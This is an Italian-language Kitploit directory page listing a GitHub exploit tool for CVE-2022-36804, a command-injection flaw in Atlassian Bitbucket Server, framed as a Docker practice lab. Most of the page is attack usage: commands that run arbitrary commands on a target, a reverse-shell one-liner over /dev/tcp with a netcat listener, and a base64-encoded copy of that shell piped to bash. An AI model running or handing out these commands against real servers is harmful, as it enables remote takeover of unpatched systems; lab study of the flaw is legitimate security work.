Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Atlassian-Bitbucket-CVE-2022-36804 | Kitploit
Strumenti/GitHubGitHub/imbas007/atlassian-bitbucket-cve-2022-36804
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlLab e Pratica
GitHubimbas007/atlassian-bitbucket-cve-2022-36804

Atlassian-Bitbucket-CVE-2022-36804

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
3 anni faNon ancora revisionato

Atlassian-Bitbucket-Server-CVE-2022-36804

Una vulnerabilità critica di command injection è stata trovata in più endpoint API di Atlassian Bitbucket Server e Data Center. Questa vulnerabilità interessa tutte le versioni di Bitbucket Server e Data Center rilasciate prima delle versioni <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2> e <8.3.1>.

Laboratorio per CVE-2022-36804

Crea l'immagine Docker

root@kitploit:~
docker build -t bitbucket .

Esegui il container Docker

root@kitploit:~
docker run -it bitbucket

Utilizzo di cve-2022-36804.py

Verifica dell'esecuzione remota di codice (RCE)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

Verifica di RCE con comando personalizzato (cmd)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

Verifica di RCE con comando personalizzato, chiave del progetto e nome del repository

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

Ottieni una shell con netcat

Sostituisci 172.17.0.3 con il tuo indirizzo IP locale

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"

Avvia il listener netcat con:

root@kitploit:~
nc -lvp 4444

Reverse shell online : https://www.revshells.com

root@kitploit:~
Convert `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` to base64 in case of payload execution error. 

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"

root@kitploit:~
Si consiglia di installare una versione vulnerabile di Bitbucket Server su una macchina Windows/Linux per esercitarsi. Sarà più facile ottenere una reverse shell rispetto alle immagini Docker.

Maggiori informazioni sono disponibili [qui](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)

# Riferimenti
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804
Scarica lo strumento